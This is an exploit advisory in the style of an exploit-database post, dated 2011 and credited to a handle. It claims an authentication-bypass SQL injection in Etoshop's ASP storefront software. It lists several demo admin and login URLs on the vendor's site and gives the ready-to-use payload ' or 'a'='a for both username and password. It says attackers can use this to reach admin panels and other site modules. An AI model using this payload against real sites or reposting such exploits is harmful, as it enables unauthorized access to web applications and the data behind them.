%+
$.......#........4.........|)........0............\/\/       %+

                                              %+
                                                       %+


%++++++++++++++++++++++++++++++++++++++++


# Exploit Title: Etoshop(Auth Bypass) SQLi Vulnerability
# Vendor: http://www.etoshop.com
# Date: 12th july,2011
# Author: $#4d0\/\/[r007k17] a.k.a Raghavendra Karthik D (
http://www.shadowrootkit.wordpress.com)
# Google Dork:  ©2000 INNER ESTEEM SDN BHD
*****************************************************************************************************************************************
*****************************************************************************************************************************************

(Auth ByPass) SQLi Vulnerability
***************************************
{DEMO} :  http://www.etoshop.com/demo/pcstore/admin.asp
                http://www.etoshop.com/demo/sbd-login.asp
                http://www.etoshop.com/demo/cac-login.asp
                http://www.etoshop.com/demo/csf-login.asp
EXPLOIT:
                 Username: ' or 'a'='a
                 Password: ' or 'a'='a
Observe: Attackers can use Authentication Bypass to get into Admin
Panel,storebuilder,c2c auction,classifieds in the site.

********************************************************************************************************************************************
gr33t1ngs to s1d3 effects and my friends@!3.14--
********************************************************************************************************************************************